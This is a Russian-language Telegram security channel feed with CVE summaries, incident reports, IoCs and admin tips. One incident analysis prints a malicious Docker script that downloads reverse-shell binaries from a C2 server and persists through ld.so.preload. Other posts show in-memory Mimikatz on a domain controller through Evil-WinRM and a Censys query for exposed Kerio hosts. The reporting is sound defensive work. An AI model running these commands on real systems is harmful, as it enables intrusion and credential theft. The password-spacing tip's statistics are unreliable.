SecuriXy.kz


Гео и язык канала: Казахстан, Русский
Категория: Технологии


Все самое интересное из мира информ. безопасности и IT 👍🏻
Обсуждаем, делимся, умнеем
https://securixy.kz
Обратная связь - @feedback_securixy_bot
Хахатушки - @memekatz
Hack the Box RUS - @HTB_RUS

Связанные каналы  |  Похожие каналы

Гео и язык канала
Казахстан, Русский
Категория
Технологии
Статистика
Фильтр публикаций


🔥 Неожиданный хак по кибербезопасности, который сбивает с толку 97% хакеров!

Один из самых простых, но эффективных способов усложнить взлом пароля - просто добавить несколько пробелов в конце.

📌 Почему это работает?
🔹 Разница во времени взлома между “ThanksForSh@ring!” и “ThanksForSh@ring! “ может измеряться годами.
🔹 При утечке паролей большинство атакующих не скопируют пробел в конце, так как он незаметен.

💡 Бонусный уровень защиты:
✅ Добавьте невидимый пробел (Unicode \u200B) или новую строку (Unicode \u000A).
✅ Большинство брутфорсеров даже не проверяют наличие этих символов!

⚡ А если использовать несловарные фразы - ваш пароль становится практически неуязвимым 😉

💬 Делитесь этим лайфхаком с коллегами тк мы год за годом наблюдаем использование простых фраз, месяцев с годом и тп, а потом удивляются «а кто это сделал, как взломали»!


Репост из: ESCalator
(Ex)Cobalt в контейнере 🛂

В ходе реагирования на компьютерный инцидент команда PT ESC IR установила факт закрепления злоумышленников в Docker-контейнерах.

Анализируя дамп с узла, на котором установлен Docker, мы обнаружили образцы ВПО в директории /var/lib/docker/overlay2/[a-z0-9]+/diff/usr/bin/.+. Она содержит слои контейнеров:

/var/lib/docker/overlay2/[REDACTED]/diff/usr/bin/processes — Reverse SSH
/var/lib/docker/overlay2/[REDACTED]/diff/usr/bin/checks — ExСobalt Reverse SSH

Стало понятно, что мы обнаружили заражение внутри одного из контейнеров. Для дополнительного анализа мы получили Docker-образ, на основе которого создавался контейнер. Пример команды:

docker save myimage:latest | gzip > myimage_latest.tar.gz

Анализ истории показал, что атакующим удалось модифицировать образ путем выполнения двух команд: COPY, которая копировала файл update в образ, и команды запуска скрипта /bin/bash /update. Затем модифицированный образ был загружен в локальный Docker Registry.

{
"created": "2023-08-11T01:13:12",
"created_by": "/bin/sh -c #(nop) COPY file:[REDACTED] in / "
},
{
"created": "2023-08-11T01:13:18",
"created_by": "/bin/sh -c /bin/bash /update"
}

Далее в одном из слоев образа мы обнаружили самоудаляющийся sh-скрипт update:

#!/bin/bash
rm -- $0
apt update
apt install wget curl -y
apt-get clean autoclean
apt-get autoremove --yes
wget -q [REDACTED]:8000/bin/rev_sh_dns -O /usr/bin/checks
wget -q [REDACTED]:8000/bin/rev_ssh -O /usr/bin/processes
wget -q [REDACTED]:8000/lib/libssoc.so.3h -O /usr/lib/x86_64-linux-gnu/libssoc.so
chmod +x /usr/bin/checks /usr/bin/processes /usr/lib/x86_64-linux-gnu/libssoc.so
echo "/usr/lib/x86_64-linux-gnu/libssoc.so" >> /etc/ld.so.preload

Скрипт подгружал образцы ВПО с управляющего сервера в образ, а также для закрепления прописывал их в /etc/ld.so.preload.

/usr/lib/x86_64-linux-gnu/libssoc.so — образец ExСobalt Launcher запускает процессы /usr/bin/checks и /usr/bin/processes.

🧐 Расследование показало, что атакующие модифицировали Docker-образ создаваемых контейнеров и таким образом не только закрепились в скомпрометированной инфраструктуре, но и получили контроль над вновь создаваемыми контейнерами.

Чтобы предотвратить подобные компьютерные инциденты, рекомендуется проверять ОС, а также функционирующие на устройствах Docker-контейнеры и конфигурационные файлы / скрипты, участвующие в сборке.

IoCs:

leo.rpm-bin.link
mirror.dpkg-source.info

e49b72e58253f4f58f9c745757eb3ab0
3bd5560b50c751c91056bfe654f9bc70
ef587305a462161682f74d0cad139caa

#ir #ioc #malware
@ptescalator


Оказывается давным давно в #httpx появилась полезная фича - возможность создания скриншотов целевых веб-страниц с помощью параметра -ss.

Это значительно упрощает процесс сбора информации о веб-приложениях и их визуальном состоянии. Раньше использовал Aquatone, отдельно обрабатывал вывод, а тут бац запустил и готово и все по папочкам


httpx -silent -fr -ss -sc -title -retries 10 -probe-all-ips -t 50 -tech-detect -rhsts


🚨 Active Directory Privilege Escalation (CVE-2025-21293) - CVSS 8.8

🔍 Критическая уязвимость в службах Active Directory Domain Services, позволяет злоумышленникам с низкими привилегиями получить административный доступ к домену, что ставит под угрозу безопасность всей инфраструктуры.

Группа “Network Configuration Operators” имеет право CreateSubKey в реестре Windows для служб DnsCache и NetBT. Это позволяет создавать подпараметры в реестре этих служб. Используя эту возможность, злоумышленник может зарегистрировать собственные счетчики производительности (Performance Counters), что в конечном итоге позволяет выполнить произвольный код с привилегиями системы (NT\SYSTEM).

🛡 Рекомендации: Для защиты от этой уязвимости рекомендуется ограничить права группы “Network Configuration Operators” и установить соответствующие обновления безопасности от Microsoft.

PoC: https://birkep.github.io/posts/Windows-LPE/


Репост из: Сертификат безопасности
Если посмотреть в VirusTotal Premium 💎👑 на хэшики из публикации Sekoia про атаку на МИД, то можно увидеть, что вредоносные документы были загружены из Казахстана. 👀 Очевидно, что ИБ-компании создают ханты и Yara правила на сэмплы на сервисе VT, поэтому обнаружение нового кластера APT28 🥸 стало делом времени. Прискорбным фактом тут является то, что мы сами сливаем данные в облака, а потом видим хайповые публикации с политическим подтекстом. 📣

Всё это повышает актуальность создания собственных средств, инструментов и сервисов для кибербезопасности. 🔼 Примером такого сервиса является malware.kz. По правде говоря, он создан "на коленке", и еле дышит. 📎 Но, я и не задавался целью создать замену VirusTotal, для одиночки это не под силу - слишком много ресурсов требуется. Этот проект - лишь отработка концепции такого сервиса, задел на будущее, так сказать. 🔜

Но отойдем от философских размышлений. ✨ Вернул на malware.kz проверку загружаемых файлов при помощи ClamAV и дополнил его сканированием по Yara-правилам. Это позволит пользователю хоть как-то идентифицировать и классификацировать малварь. 🎮 Кстати, Yara правила взял с проекта Yara Forge - в этом проекте собраны правила из популярных фидов. Всё в одном файле и сразу готово к интеграции - бери и пользуйся. ⚙️🛡


Набор простеньких корреляционных правил детекта Kusto (KQL) для продуктов Microsoft (Azure, Defender XDR (Defender 365), Microsoft Sentinel) мб кому пригодятся.

Как пример, нашумевший Zero Click RCE для MS Outlook и другие правила в постоянно пополняемом репозитории.

https://github.com/SlimKQL/Hunting-Queries-Detection-Rules/blob/main/DefenderXDR/CVE-2025-21298%20Zero-Click%20RCE.kql

По указанной выше уязвимости уже выявлены активные C2 (IoC ниже)


IP: 185.199.109.133

MD5: 9d68678aeee52684bbe3c983222b1da3


Век живи - век учись...

Интересный встроенный функционал #Evil-WinRM узнал недавно изучая очередной «индусский» курс.

Суть в то, что у Evil-WinRM есть встроенный тулсет доступный через menu.

И есть например - функция Invoke-Mimikatz которая позволяет загружать и выполнять утилиту Mimikatz непосредственно в памяти целевой системы, что снижает вероятность обнаружения антивирусными средствами.

А еще, он поддерживает переменные при выполнении команд, и если нам нужно исполнить скрипт или еще что-то не на целевой заовненной системе, а за ее пределами, например на контроллере домена, без необходимости пробрасывания туннельки - мы можем использовать это для выполнения наших команд безтельно (в памяти).

На примере ниже - исполнение мимикатза из памяти на контролле домена DC через WinRM сессию с пользовательского хоста


*Evil-WinRM* PS UserHost#> Invoke-Command -computername dc.intranet.poo -scriptblock ${function:Invoke-Mimikatz} -credential $cred


Золотые слова одного нашего товарища взятые из романа Джорджа Оруэлла “1984”:

«министерство мира - занимается войной

министерство правды - занимается фальсификациями и подставами

министерство технологий - слежкой и блокировками

обычный человек - везет это все, кормит их всех...

идем своей дорогой, дорогой товарищ!

идут они все на үй!»


Согласно официальному заявлению компании Keenetic, с 1 марта 2025 года мобильное приложение Keenetic и система удалённого мониторинга и управления rmm.keenetic.com перестанут работать в связи с изменениями в применимом законодательстве. Вместо них пользователям предлагается перейти на новые инструменты под брендом Netcraze.

Согласно информации из источников, изменения касаются стран Евразийского экономического союза (ЕАЭС), в который входит и Казахстан. Поэтому с высокой вероятностью можно предположить, что данное изменение относится и к Казахстану.

Нет никакой конкретики, но явно намекают, что политические «игрища» снова затрагивают обычных пользователей, теперь уже и EAEU (ЕАЭС)

https://keenetic.ru/ru/service-update


🔥 Критическая уязвимость в Microsoft Outlook: CVE-2025-21298 (Zero Click) 🔥

🚨 Описание: Уязвимость CVE-2025-21298 позволяет злоумышленникам выполнять произвольный код на системе жертвы путём отправки специально сформированного электронного письма. Открытие или предварительный просмотр такого письма в Microsoft Outlook может привести к удалённому выполнению кода без взаимодействия пользователя.

🔴 Детали:
Тип уязвимости: RCE через Windows OLE
CVSS: 9.8 (Критическая)
Механизм атаки: Отправка вредоносного письма с внедрённым OLE-объектом; выполнение кода происходит при открытии или предварительном просмотре письма в Outlook

💡 Рекомендации:
1. Обновление: Немедленно установить соответствующие обновления безопасности от Microsoft.
2. Настройки безопасности: Отключить предварительный просмотр сообщений и настроить отображение писем в виде обычного текста для снижения риска эксплуатации.
3. Бдительность: Избегать открытия писем и вложений от неизвестных отправителей.

⚠️ Важно: Данная уязвимость позволяет атакующим выполнять код без какого-либо взаимодействия со стороны пользователя, что делает её особенно опасной.

🔗 Дополнительная информация:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21298

В последнем Бюллетене безопасности от Microsoft исправления еще целой пачки опасных уязвимостей, так что обновляйтесь своевременно.


В связи с изменениями в Кодексе Республики Казахстан об административных правонарушениях (КоАП) от 10 января 2025 г, вступающими в силу 13 марта 2025 года, усилена ответственность за нарушения в области информационной безопасности и защиты персональных данных.

Можно сказать, что новые изменения в Кодексе Республики Казахстан об административных правонарушениях (КоАП) расширяют требования, ранее установленные Постановлением Правления Национального Банка Республики Казахстан от 27 марта 2018 года № 48, на более широкий круг организаций. Если ранее строгие требования к информационной безопасности и соответствующие штрафные санкции применялись преимущественно к банковскому сектору, то теперь они распространяются на все организации, обрабатывающие персональные данные.

https://online.zakon.kz/m/app/document/?doc_id=33424342&pos=297%3B-1894%23pos%3D297%3B-1894


🔥 Критическая уязвимость в Kerio Control 🔥

🚨 #CVE-2024-52875 - Обнаружена уязвимость в Kerio Control (версии 9.2.5–9.4.5), позволяющая злоумышленникам эскалировать атаку с внедрения CRLF до выполнения произвольного кода (RCE) с одного клика.

🔴 Детали: Уязвимость связана с недостаточной фильтрацией пользовательского ввода в параметре dest на страницах /nonauth/addCertException.cs, /`nonauth/guestConfirm.cs` и /nonauth/expiration.cs веб-интерфейса Kerio Control. Это позволяет выполнять атаки типа HTTP Response Splitting, приводящие к открытым перенаправлениям и отражённому XSS.

💡 Рекомендации: Обновите Kerio Control до последней версии.

💻 PoC: https://karmainsecurity.com/pocs/CVE-2024-52875.php

🔍 Реквест в censys

services.software: (vendor="GFI" and product="Kerio Control") and location.country: "Kazakhstan" and not labels: {honeypot, tarpit}


Репост из: Threat Hunting Father
Ivanti Connect Secure VPN Targeted in New Zero-Day Exploitation🖥

С середины декабря 2024 года атакующие, активно эксплуатируют новую уязвимость нулевого дня в устройствах Ivanti Connect Secure VPN. Компания Mandiant (часть Google Cloud) в сотрудничестве с Ivanti обнаружили интересную компанию и выкатили технические подробности

Из интересного:
- Эксплуатация:
CVE-2025-0282 - в целом включает в себя такие шаги:
•Disable SELinux
•Prevent syslog forwarding
•Remount the drive as read-write
•Write the script
•Execute the script
•Deploy one or more web shells
•Use sed to remove specific log entries from the debug and application logs
•Reenable SELinux
•Remount the drive

- Фейковое обновление:
Атакующие используют ВПО PHASEJAM для блокировки легитимных системных обновлений, одновременно отображая поддельную панель прогресса обновления. Это создает иллюзию успешного обновления, в то время как на самом деле обновление не происходит, что обманывает администраторов системы.

-Обход проверок целостности:
Манипулируют манифестом инструмента Ivanti Integrity Checker Tool (ICT), злоумышленники включают в него свои вредоносные файлы, эффективно обходя этот критически важный механизм обнаружения.

- Для закрепления: Устанавливаются бэкдоры, способные пережить перезагрузки и обновления системы, обеспечивая длительный несанкционированный доступ.


В случае обнаружения Zeroday, помогает только патч, что и советуют исследователи Mandiant.
Также рекомендуют запустить внешний инструмент Ivanti ICT для проверки целостности системы.

🖥 https://cloud.google.com/blog/topics/threat-intelligence/ivanti-connect-secure-vpn-zero-day

🦔 @ThreatHuntingFather


Если Вам нужно собрать хеши к примеру #sha256 со всех файлов внутри папки с собранными артефактами


find . -exec sha256sum {} +

Но в выводе будут ошибки Is a directory на подпапки, если они есть и можно отфильтровать так:

find . -type f -exec sha256sum {} +


Еще одна интересность, если Вам понадобилось посмотреть авторов форков #fork какого-то репозитория в #github:

1. Вам нужно создать API токен Personal Access Token (PAT)
Войдите в свою учетную запись GitHub.
Перейдите в Settings (Настройки):
• Нажмите на аватар в правом верхнем углу.
• Выберите Settings.
Перейдите в раздел Developer settings:
• На левой боковой панели выберите Developer settings.
Выберите Personal access tokens > Tokens (classic):
• Нажмите Generate new token.
Укажите:
• Имя токена (например, API Access).
• Установите срок действия токена (по умолчанию 30 дней).
• Укажите разрешения:
• Для публичных репозиториев выберите public_repo.
• Для приватных репозиториев выберите repo.

Нажмите Generate token и Скопируйте токен! (GitHub покажет его только один раз).

и пользуетесь

curl -H "Authorization: token YOUR_TOKEN" https://api.github.com/repos/michenriksen/aquatone/forks | jq -r '.[].html_url'


так чисто на заметку по #TMux
Если упала сессия или разрыв произошел, Вы заходите а там:

# tmux a
no sessions

Хотя в процессах он определённо висит:

ps aux |grep tmux
root 2260263 0.0 0.3 244204 7020 ? Ss Jan05 0:37 tmux

Оказывается можно пересоздать сокет процесса и подключиться к тмуксу обратно)

pkill -USR1 tmux
tmux a

https://github.com/tmux/tmux/wiki/FAQ#tmux-says-no-sessions-when-i-try-to-attach-but-i-definitely-had-sessions


Приветствую Вас в новом 2025 году дорогие подписчики!
Надеемся, что все в здравии и в бодрости духа приступили к рабочей неделе 😉

Хотим Вам предложить очередное чтиво, о кратком расследовании недавнего инцидента по просьбе товарища.

https://www.clevergod.net/1725cf4c2b3e80c8a0fbdb9a445f408d

Приятного чтения, вскоре добавим еще одну статью с подобным заражением, но с большим охватом.
#dfir #forensic #trojan #self_research


Дорогие друзья,

2024 год был насыщенным и непростым - усиление киберугроз для облачных сервисов, корпоративной инфраструктуры и цепочек поставок стало вызовом для всех нас. Это напомнило, как важно быть на шаг впереди и искать новые подходы к безопасности в 2025 году.

🎉 Сердечно поздравляем вас с наступающим Новым годом!
Пусть 2025 год будет для вас временем радости, успеха и свершений. Желаем вам и вашим близким здоровья, счастья и гармонии. А вам лично - интересных кейсов, новых знаний, профессиональных побед и долгожданных сертификатов! 🎓

Спасибо, что были с нами в этом году. Ваша поддержка вдохновляет нас становиться лучше.
Оставайтесь с нами в 2025 году - впереди ещё много интересного!

Stay safe, stay tuned


Недавно компания Cyberhaven, специализирующаяся на предотвращении утечек данных, столкнулась с компрометацией своего браузерного расширения. Злоумышленники получили доступ к административной учётной записи в Chrome Web Store и опубликовали вредоносную версию расширения (v24.10.4), которая собирала данные пользователей и отправляла их на домен cyberhavenext[.]pro.

Индикаторы компрометации (IoC):
Домены C&C:

cyberhavenext[.]pro
api[.]cyberhavenext[.]pro

IP-адреса:

149.248.2.160
149.28.124.84

Файлы расширения:

content.js — SHA-1: AC5CC8BCC05AC27A8F189134C2E3300863B317FB
worker.js — SHA-1: 0B871BDEE9D8302A48D6D6511228CAF67A08EC60
CRX-пакет — SHA-256: b53007dc2404dc3a4651db2756c773aa8e48c23755eba749f1641542ae796398


ID расширения:
pajkjnmeojmbapicmbpliphjmcekeaac

Рекомендации:
• Проверьте, не установлена ли у вас версия расширения Cyberhaven 24.10.4.
• Если установлена, немедленно обновите до последней безопасной версии.
• Проанализируйте сетевой трафик на предмет обращений к домену cyberhavenext[.]pro.
• Рассмотрите возможность смены паролей и сброса сессий для учетных записей, использованных в период активности вредоносного расширения.

Этот случай подчёркивает необходимость осторожного подхода к установке и использованию браузерных расширений, даже от доверенных поставщиков.

Источник: https://keepaware.com/blog/cyberhaven-browser-extension-compromise


В Декабрьском бюллетене безопасности Microsoft есть бага CVE-2024-49112 о которой пошумели и думали она закроется патчем. Но нет… В паблике продают PoC за 157$

Уязвимость в протоколе Lightweight Directory Access Protocol (LDAP) в Microsoft Windows. Позволяет неаутентифицированным злоумышленникам удалённо выполнять произвольный код через специально сформированные LDAP-запросы. Это может привести к захвату системы и утечке данных.

💡 Почему это важно:
☠️ Неконтролируемый доступ к уязвимым системам.
☠️ Потенциальная утечка данных и сбои в работе сервисов.
☠️ Риск массового компрометации сети.

🛡️ Рекомендуемые действия:
✅ Проверьте, что входящие RPC-соединения разрешены только для доверенных внутренних сетей.
✅ Убедитесь, что контроллеры домена не имеют прямого доступа в Интернет (только DNS если он у Вас на контроллере).
✅ Проверьте систему на наличие уязвимых конфигураций с помощью скриптов или специализированных инструментов.
✅ Установите последние патчи безопасности от Microsoft.
✅ Мониторьте LDAP и RPC-трафик для выявления подозрительной активности.

Скрипт для чека доступа по RPC и выхода в интернет (для проверки админами на контроллерах)

# Detection script for CVE-2024-49112
Write-Output "Checking system configuration for CVE-2024-49112..."

# Check if the system is a Domain Controller
$isDomainController = (Get-WmiObject Win32_ComputerSystem).DomainRole -eq 4 -or (Get-WmiObject Win32_ComputerSystem).DomainRole -eq 5
if (-not $isDomainController) {
Write-Output "This system is not a Domain Controller. No action needed."
exit
}

# Check if inbound RPC from untrusted networks is blocked
$rpcsrvstatus = Get-NetFirewallRule -DisplayName "*RPC*" | Where-Object {$_.Direction -eq "Inbound" -and $_.Enabled -eq "True"}
if ($rpcsrvstatus) {
Write-Output "Warning: Inbound RPC connections from untrusted networks are allowed. This configuration is vulnerable."
} else {
Write-Output "Inbound RPC connections from untrusted networks are blocked."
}

# Check if the Domain Controller has internet access
$internetAccess = Test-Connection -ComputerName "1.1.1.1" -Count 2 -Quiet
if ($internetAccess) {
Write-Output "Warning: Domain Controller has internet access. This configuration is vulnerable."
} else {
Write-Output "Domain Controller does not have internet access."
}

Write-Output "Detection complete."

Показано 20 последних публикаций.